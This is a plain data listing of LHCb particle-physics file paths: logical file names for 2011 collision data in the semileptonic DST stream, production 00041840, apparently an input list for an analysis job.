'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010045_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019839_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021741_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023097_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024239_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027792_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019180_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030032_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054727_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051617_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011109_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042341_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029024_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009417_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029093_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062663_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029980_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025275_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002754_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044290_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059543_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015189_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067351_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024036_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042087_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064453_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056943_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045011_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065928_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058587_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026705_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006104_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063158_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036822_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003957_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040659_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058027_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033607_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042089_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059967_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005497_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014068_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058121_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064647_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067034_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018082_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053944_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061132_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012760_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046134_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049334_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053670_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006792_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050466_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063936_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048581_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065653_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047434_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047862_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022500_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003349_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038027_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039370_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059713_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052566_1.semileptonic.dst',
